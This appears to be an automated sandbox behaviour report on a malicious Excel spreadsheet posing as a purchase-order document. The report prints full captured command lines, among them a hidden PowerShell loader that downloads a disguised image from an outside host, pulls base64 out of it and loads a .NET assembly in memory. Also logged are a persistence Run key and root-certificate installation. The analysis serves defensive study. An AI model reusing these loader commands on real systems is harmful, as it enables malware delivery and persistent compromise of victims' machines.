Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Automated click: OK
Source: C:\Windows\System32\wscript.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: xF3wienia PO2102559-1.xlsx

Static file information: File size 2146106 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\System.pdbpdbtem.pdbGAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb99 source: powershell.exe, 00000008.00000002.446551677.000000000515E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256+ source: powershell.exe, 00000008.00000002.468489304.00000000095D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.441662069.00000000041E9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.468489304.00000000095D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.441662069.00000000041E9000.00000004.00000800.00020000.00000000.sdmp

Source: xF3wienia PO2102559-1.xlsx

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00385BB6 push ebx; iretd		8_2_00385BC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00385BAB push ebx; iretd		8_2_00385BAD

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0356043D URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_0356043D

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\word.vbs

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
